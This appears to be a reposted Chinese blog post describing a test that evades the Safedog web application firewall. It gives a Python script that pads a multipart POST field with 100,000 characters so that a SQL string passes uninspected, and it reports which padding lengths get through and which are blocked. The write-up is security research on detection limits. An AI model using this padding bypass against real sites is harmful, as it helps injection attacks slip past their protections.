iverson5

bypass 最新安全狗

最近在做特征的时候发现IPS的检测中往往会有一个最大检测长度,譬如IPS最大检测长度可能于数据包的个数或则数据流的长度有关。于是乎就想着做了个测试,测试安全狗的检测是否也会有长度的限制,于是乎就有了此篇帖子。

测试步骤:
1:使用wamp搭建一个web环境,并且安装最新版本的安全狗,3.1.0.9833.

2:下面就开始测试了,我使用python书写一个post提交,post提交的内容包括select 1 from table;

3:编写code:

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

import urllib2

 

url = "http://192.168.4.70/3.php"

 

header = {

    'User-Agent' : 'letmetest',

  'Content-Type' : 'multipart/form-data; boundary=----WebKitFormBoundarycMYRelX1B2H69xy9'

}

 

def getdata(m):

    return "1"*m

 

 

def postdata(n):

 

    data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'

 

    data += 'Content-Disposition: form-data; name="file"\r\n\r\n'

 

    data += '%s\r\n' %  "0"*n

 

    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'

 

    data += 'Content-Disposition: form-data; name="submit"\r\n\r\n'

 

    data += 'select 1 from table\r\n'

 

    data += '------WebKitFormBoundarycMYRelX1B2H69xy9--\r\n\r\n'

 

    return data

 

request = urllib2.Request(url,postdata(100000),header)

response = urllib2.urlopen(request).read()

print response

 

4:测试结果
注意postdata中的内容,我自己去改变它的长度,譬如我输入长度为100000的时候,返回的结果如下图:
100000.jpg
可以看到显示的内容为web服务器的内容。

当我将postdata的内容改为长度1000的时候,结果如下:
1000.jpg
这样可以看到内容被安全狗阻拦了。

5:结论
看来安全狗貌似防范的内容受到长度的控制,用这种post的方法可以bypass。

ps.drops上有一篇关于ips的bypass的文章,貌似此方法也可以bypass ips。

http://drops.wooyun.org/papers/4323

 

转自http://zone.wooyun.org/content/17331

 

Comments (0)

转载请注明 Sunshie's Blog http://phpinfo.me
原文地址: http://phpinfo.me/2014/12/16/789.html
评论

iverson5

© iverson5 | Powered by LOFTER